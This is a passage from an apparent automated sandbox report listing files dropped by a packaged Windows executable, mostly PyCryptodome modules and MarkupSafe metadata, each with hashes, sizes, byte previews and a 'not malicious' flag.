                                                                                                                                                                                                                                                                              SSDEEP:192:dMpWt/1nCuqaL0kt7TsEx2fiTgDZqGF0T7cqgkLgJ:k/k1Ts64DDJyBgkLg
                                                                                                                                                                                                                                                                              MD5:5F057A380BACBA4EF59C0611549C0E02
                                                                                                                                                                                                                                                                              SHA1:4B758D18372D71F0AA38075F073722A55B897F71
                                                                                                                                                                                                                                                                              SHA-256:BCB14DAC6C87C24269D3E60C46B49EFFB1360F714C353318F5BBAA48C79EC290
                                                                                                                                                                                                                                                                              SHA-512:E1C99E224745B86EE55822C1DBCB4555A11EC31B72D87B46514917EB61E0258A1C6D38C4F592969C17EB4F0F74DA04BCECA31CF1622720E95F0F20E9631792E8
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^J.6?$.6?$.6?$.?G..2?$.dJ%.4?$.}G%.5?$.6?%..?$.dJ!.<?$.dJ .>?$.dJ'.5?$..J,.7?$..J$.7?$..J..7?$..J&.7?$.Rich6?$.........................PE..d...V..f.........." ................P.....................................................`.........................................P8.......8..d....`.......P...............p..(....1...............................1..8............0...............................text............................... ..`.rdata..2....0......................@..@.data...H....@.......(..............@....pdata.......P.......*..............@..@.rsrc........`......................@..@.reloc..(....p.......0..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_ghash_portable.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):13312
                                                                                                                                                                                                                                                                              Entropy (8bit):5.007867576025166
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:bMt/1nCuqaL0ktPH0T7fwtF4zDn2rGacqgRGd:1/kpU3Yv4zDXqgRGd
                                                                                                                                                                                                                                                                              MD5:49BCA1B7DF076D1A550EE1B7ED3BD997
                                                                                                                                                                                                                                                                              SHA1:47609C7102F5B1BCA16C6BAD4AE22CE0B8AEE9E9
                                                                                                                                                                                                                                                                              SHA-256:49E15461DCB76690139E71E9359F7FCF92269DCCA78E3BFE9ACB90C6271080B2
                                                                                                                                                                                                                                                                              SHA-512:8574D7FA133B72A4A8D1D7D9FDB61053BC88C2D238B7AC7D519BE19972B658C44EA1DE433885E3206927C75DD5D1028F74999E048AB73189585B87630F865466
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...V..f.........." ................P.....................................................`..........................................8.......8..d....`.......P..X............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......*..............@....pdata..X....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..(....p.......2..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_keccak.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):15872
                                                                                                                                                                                                                                                                              Entropy (8bit):5.226023387740053
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:384:rfRKTN+HLjRskTdf4WazSTkwjEvuY2bylHDiYIgovg:mcHfRl5pauoSjy5DiE
                                                                                                                                                                                                                                                                              MD5:CB5CFDD4241060E99118DEEC6C931CCC
                                                                                                                                                                                                                                                                              SHA1:1E7FED96CF26C9F4730A4621CA9D18CECE3E0BCE
                                                                                                                                                                                                                                                                              SHA-256:A8F809B6A417AF99B75EEEEA3ECD16BDA153CBDA4FFAB6E35CE1E8C884D899C4
                                                                                                                                                                                                                                                                              SHA-512:8A89E3563C14B81353D251F9F019D8CBF07CB98F78452B8522413C7478A0D77B9ABF2134E4438145D6363CDA39721D2BAE8AD13D1CDACCBB5026619D95F931CF
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...U..f.........." ..... ... ......P.....................................................`..........................................9.......9..d....`.......P..X............p..(...p2...............................2..8............0...............................text............ .................. ..`.rdata..@....0.......$..............@..@.data........@.......4..............@....pdata..X....P.......6..............@..@.rsrc........`.......:..............@..@.reloc..(....p.......<..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_poly1305.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):14848
                                                                                                                                                                                                                                                                              Entropy (8bit):5.262055670423592
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:C/ZN2eq/b04PAHH41F6fnVS0sVn+5CA5Z1cD66WGcqgFjLg:vI4IHHaQfSVnCZyDImgFjLg
                                                                                                                                                                                                                                                                              MD5:18D2D96980802189B23893820714DA90
                                                                                                                                                                                                                                                                              SHA1:5DEE494D25EB79038CBC2803163E2EF69E68274C
                                                                                                                                                                                                                                                                              SHA-256:C2FD98C677436260ACB9147766258CB99780A007114AED37C87893DF1CF1A717
                                                                                                                                                                                                                                                                              SHA-512:0317B65D8F292332C5457A6B15A77548BE5B2705F34BB8F4415046E3E778580ABD17B233E6CC2755C991247E0E65B27B5634465646715657B246483817CACEB7
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...V..f.........." ................P.....................................................`..........................................8.......9..d....`.......P..|............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......."..............@..@.data........@.......0..............@....pdata..|....P.......2..............@..@.rsrc........`.......6..............@..@.reloc..(....p.......8..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Math\_modexp.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):36352
                                                                                                                                                                                                                                                                              Entropy (8bit):5.913843738203007
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:384:dspbXtHQY4ubrttQza9CHnZXQsnecAlOF0qZLAXxQI3Sya6XPpMg3Yx8MnDcCPSq:7Y44UagH6cAFCLUSYpMg3YDzPo5kG9G
                                                                                                                                                                                                                                                                              MD5:EF472BA63FD22922CA704B1E7B95A29E
                                                                                                                                                                                                                                                                              SHA1:700B68E7EF95514D5E94D3C6B10884E1E187ACD8
                                                                                                                                                                                                                                                                              SHA-256:66EEF4E6E0CEEEF2C23A758BFBEDAE7C16282FC93D0A56ACAFC40E871AC3F01C
                                                                                                                                                                                                                                                                              SHA-512:DC2060531C4153C43ABF30843BCB5F8FA082345CA1BB57F9AC8695EDDB28FF9FDA8132B6B6C67260F779D95FCADCAE2811091BCA300AB1E041FAE6CC7B50ABD8
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...|...5...}...~...U...,...u...,...v...,...}.......|............._.............Rich~...................PE..d...^..f.........." .....`...0......`.....................................................`..........................................~..|...L...d...............<...............(....q...............................q..8............p..(............................text...X^.......`.................. ..`.rdata.......p.......d..............@..@.data................x..............@....pdata..<...........................@..@.rsrc...............................@..@.reloc..(...........................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Protocol\_scrypt.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                                                                                              Entropy (8bit):4.735350805948923
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:rhsC3eqv6b0q3OQ3rHu5bc64OhD2I/p3cqgONLg:r/Hq3jHuY64OhDJJgONLg
                                                                                                                                                                                                                                                                              MD5:3B1CE70B0193B02C437678F13A335932
                                                                                                                                                                                                                                                                              SHA1:063BFD5A32441ED883409AAD17285CE405977D1F
                                                                                                                                                                                                                                                                              SHA-256:EB2950B6A2185E87C5318B55132DFE5774A5A579259AB50A7935A7FB143EA7B1
                                                                                                                                                                                                                                                                              SHA-512:0E02187F17DFCFD323F2F0E62FBFE35F326DCF9F119FC8B15066AFAEEE4EB7078184BC85D571B555E9E67A2DD909EC12D8A67E3D075E9B1283813EF274E05C0D
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^:.6?T.6?T.6?T.?G..2?T.dJU.4?T.}GU.5?T.6?U..?T.dJQ.<?T.dJP.>?T.dJW.5?T..J\.7?T..JT.7?T..J..7?T..JV.7?T.Rich6?T.........................PE..d...Z..f.........." ................P.....................................................`..........................................8..d....8..d....`.......P..4............p..(....1...............................1..8............0...............................text...H........................... ..`.rdata..0....0......................@..@.data........@.......&..............@....pdata..4....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..(....p......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_curve25519.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):22528
                                                                                                                                                                                                                                                                              Entropy (8bit):5.705606408072877
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:384:19BcRxBmau38CYIl9bhgIW0mvufueNr359/tjGGDEFSegqrA:NcRy38J+9dmvufFtaGDV
                                                                                                                                                                                                                                                                              MD5:FF33C306434DEC51D39C7BF1663E25DA
                                                                                                                                                                                                                                                                              SHA1:665FCF47501F1481534597C1EAC2A52886EF0526
                                                                                                                                                                                                                                                                              SHA-256:D0E3B6A2D0E073B2D9F0FCDB051727007943A17A4CA966D75EBA37BECDBA6152
                                                                                                                                                                                                                                                                              SHA-512:66A909DC9C3B7BD4050AA507CD89B0B3A661C85D33C881522EC9568744953B698722C1CBFF093F9CBCD6119BD527FECAB05A67F2E32EC479BE47AFFA4377362C
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...\..f.........." .....6...$......P.....................................................`.........................................`Y......`Z..d............p..................(....R..............................0R..8............P...............................text...(5.......6.................. ..`.rdata.......P.......:..............@..@.data........`.......J..............@....pdata.......p.......P..............@..@.rsrc................T..............@..@.reloc..(............V..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_curve448.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):70656
                                                                                                                                                                                                                                                                              Entropy (8bit):6.0189903352673655
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:Jfju4GgRMgWWnEDZiECgd/iwOXUQdbhov0Clb8Cx4hpK8ithLFIDullRPwDHxXOa:pXRMgWiEDZiECgd/iwOXUQdbhov0ClbU
                                                                                                                                                                                                                                                                              MD5:F267BF4256F4105DAD0D3E59023011ED
                                                                                                                                                                                                                                                                              SHA1:9BC6CA0F375CE49D5787C909D290C07302F58DA6
                                                                                                                                                                                                                                                                              SHA-256:1DDE8BE64164FF96B2BAB88291042EB39197D118422BEE56EB2846E7A2D2F010
                                                                                                                                                                                                                                                                              SHA-512:A335AF4DBF1658556ED5DC13EE741419446F7DAEC6BD2688B626A803FA5DD76463D6367C224E0B79B17193735E2C74BA417C26822DAEEF05AC3BAB1588E2DE83
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...|...5...}...~...U...,...u...,...v...,...}.......|............._.............Rich~...................PE..d...\..f.........." .........8......`........................................P............`.............................................0.......d....0....... ..$............@..(.......................................8............................................text...8........................... ..`.rdata..............................@..@.data...............................@....pdata..$.... ......................@..@.rsrc........0......................@..@.reloc..(....@......................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_ec_ws.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):770560
                                                                                                                                                                                                                                                                              Entropy (8bit):7.613224993327352
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12288:XtIrHoxJ8gf1266y8IXhJvCKAmqVLzcrZgYIMGv1iLD9yQvG6h:XtIrHoxJFf1p34hcrn5Go9yQO6
                                                                                                                                                                                                                                                                              MD5:1EFD7F7CB1C277416011DE6F09C355AF
                                                                                                                                                                                                                                                                              SHA1:C0F97652AC2703C325AB9F20826A6F84C63532F2
                                                                                                                                                                                                                                                                              SHA-256:AB45FA80A68DB1635D41DC1A4AAD980E6716DAC8C1778CB5F30CDB013B7DF6E6
                                                                                                                                                                                                                                                                              SHA-512:2EC4B88A1957733043BBD63CEAA6F5643D446DB607B3267FAD1EC611E6B0AF697056598AAC2AE5D44AB2B9396811D183C32BCE5A0FF34E583193A417D1C5226B
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........s.. .. .. ... .. ..!.. ..!.. .. .. ..!.. ..!.. ..!.. \..!.. \..!.. \.r .. \..!.. Rich.. ................PE..d...[..f.........." ................`.....................................................`.............................................h.......d...............................0......................................8...............(............................text............................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..0...........................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_ed25519.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):26112
                                                                                                                                                                                                                                                                              Entropy (8bit):5.8551858881598795
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:384:BczadRwoF2MZ81n0XTyMCYIl9bhgIW0mv8aeadRcwRwftjGLD2pRQNgQQ77k:2udRf2MuMJ+9dmv8aea34taLDcfQ
                                                                                                                                                                                                                                                                              MD5:C5FB377F736ED731B5578F57BB765F7A
                                                                                                                                                                                                                                                                              SHA1:5BA51E11F4DE1CAEDEBA0F7D4D10EC62EC109E01
                                                                                                                                                                                                                                                                              SHA-256:32073DF3D5C85ABCE7D370D6E341EF163A8350F6A9EDC775C39A23856CCFDD53
                                                                                                                                                                                                                                                                              SHA-512:D361BCDAF2C700D5A4AC956D96E00961432C05A1B692FC870DB53A90F233A6D24AA0C3BE99E40BD8E5B7C6C1B2BCDCDCFC545292EF321486FFC71C5EA7203E6A
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...]..f.........." .....B...&......P.....................................................`..........................................i..0....k..d...............................(... b..............................@b..8............`...............................text....A.......B.................. ..`.rdata..P....`.......F..............@..@.data........p.......V..............@....pdata...............^..............@..@.rsrc................b..............@..@.reloc..(............d..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_ed448.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):84992
                                                                                                                                                                                                                                                                              Entropy (8bit):6.064677498000638
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:BrYNvxcZeLrIeNs2qkTwe57DsuP45PqAqVDK9agdUiwOXyQdDrov0slb8gx4TBKW:Br4vxcZeLrIeN1TvHsuP45yAqVDK9ag3
                                                                                                                                                                                                                                                                              MD5:8A0C0AA820E98E83AC9B665A9FD19EAF
                                                                                                                                                                                                                                                                              SHA1:6BF5A14E94D81A55A164339F60927D5BF1BAD5C4
                                                                                                                                                                                                                                                                              SHA-256:4EE3D122DCFFE78E6E7E76EE04C38D3DC6A066E522EE9F7AF34A09649A3628B1
                                                                                                                                                                                                                                                                              SHA-512:52496AE7439458DEDB58A65DF9FFDCC3A7F31FC36FE7202FB43570F9BB03ABC0565F5EF32E5E6C048ED3EBC33018C19712E58FF43806119B2FB5918612299E7E
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...|...5...}...~...U...,...u...,...v...,...}.......|............._.............Rich~...................PE..d...^..f.........." .........8......`.....................................................`..........................................C..h...HE..d....p.......`..l...............(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......4..............@....pdata..l....`.......>..............@..@.rsrc........p.......H..............@..@.reloc..(............J..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Util\_cpuid_c.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):10240
                                                                                                                                                                                                                                                                              Entropy (8bit):4.675380950473425
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:96:frQRpBddzAvzrqTOy/ThIz014mlxuLnkC75JiSBhsPeSztllIDpqf4AZaRcX6gnO:Qddz2KTnThIz0qfteRIDgRWcqgnCWt
                                                                                                                                                                                                                                                                              MD5:44B930B89CE905DB4716A548C3DB8DEE
                                                                                                                                                                                                                                                                              SHA1:948CBFF12A243C8D17A7ACD3C632EE232DF0F0ED
                                                                                                                                                                                                                                                                              SHA-256:921C2D55179C0968535B20E9FD7AF55AD29F4CE4CF87A90FE258C257E2673AA5
                                                                                                                                                                                                                                                                              SHA-512:79DF755BE8B01D576557A4CB3F3200E5EE1EDE21809047ABB9FF8D578C535AC1EA0277EDA97109839A7607AF043019F2C297E767441C7E11F81FDC87FD1B6EFC
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@................../....../...../......+.......*......-......&....................,....Rich...........................PE..d...X..f.........." ................P........................................p............`.........................................@'..|....'..P....P.......@...............`..(....!...............................!..8............ ...............................text............................... ..`.rdata....... ......................@..@.data...H....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..(....`.......&..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Util\_strxor.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):10240
                                                                                                                                                                                                                                                                              Entropy (8bit):4.625428549874022
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:96:flipBddzAvzrqTOy/ThIz014mlxuLnkC75JiSBhsPeSzteXuDVZqYNIfcX6gHCWx:Cddz2KTnThIz0qfteR5DVwYkcqgHCWt
                                                                                                                                                                                                                                                                              MD5:F24F9356A6BDD29B9EF67509A8BC3A96
                                                                                                                                                                                                                                                                              SHA1:A26946E938304B4E993872C6721EB8CC1DCBE43B
                                                                                                                                                                                                                                                                              SHA-256:034BB8EFE3068763D32C404C178BD88099192C707A36F5351F7FDB63249C7F81
                                                                                                                                                                                                                                                                              SHA-512:C4D3F92D7558BE1A714388C72F5992165DD7A9E1B4FA83B882536030542D93FDAD9148C981F76FFF7868192B301AC9256EDB8C3D5CE5A1A2ACAC183F96C1028B
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@................../....../...../......+.......*......-......&....................,....Rich...........................PE..d...Z..f.........." ................P........................................p............`......................................... '..t....'..P....P.......@...............`..(....!...............................!..8............ ...............................text...h........................... ..`.rdata..`.... ......................@..@.data...H....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..(....`.......&..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\MarkupSafe-3.0.2.dist-info\INSTALLER

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:pip.

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\MarkupSafe-3.0.2.dist-info\LICENSE.txt

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1503
                                                                                                                                                                                                                                                                              Entropy (8bit):5.133773234982206
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:zUnzuObOVprYFT7JPprYFTsQYl9BiZ9ws43z5EBkuFN8WROm32si/yxtafyQ3toC:pIOVprYJNprYJSAD743LG32sQEtXQ3tf
                                                                                                                                                                                                                                                                              MD5:779964CD6648AA66466FB0D1A9629339
                                                                                                                                                                                                                                                                              SHA1:FC9C6859D60126F53FEC0DC6C145063013C30724
                                                                                                                                                                                                                                                                              SHA-256:4631EC0DB5FD90A547E336817264C6798214338146F8AC94B4A57F96EE8C9EC4
                                                                                                                                                                                                                                                                              SHA-512:6728DF7E3CED050809E1DEFF9573D838A846E1B01D00F7B49386A657C4F887A0E14CDF5DE91A7E1498647E3D452D0664381B4F9A02CC56A8EDE892FE11614D33
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:Copyright 2010 Pallets....Redistribution and use in source and binary forms, with or without..modification, are permitted provided that the following conditions are..met:....1. Redistributions of source code must retain the above copyright.. notice, this list of conditions and the following disclaimer.....2. Redistributions in binary form must reproduce the above copyright.. notice, this list of conditions and the following disclaimer in the.. documentation and/or other materials provided with the distribution.....3. Neither the name of the copyright holder nor the names of its.. contributors may be used to endorse or promote products derived from.. this software without specific prior written permission.....THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS.."AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A..PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL TH

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\MarkupSafe-3.0.2.dist-info\METADATA

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):4067
                                                                                                                                                                                                                                                                              Entropy (8bit):5.213437409146375
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:96:DU/JnBVJrYJtJrYJdM3a38lq42UkUQIQs0rEVmhTdYSkQbUY:8HnrsPrsdM3a3cqnjY0w0hTGSkQD
                                                                                                                                                                                                                                                                              MD5:60CC921B7461A060DAB0456B6EFFFA68
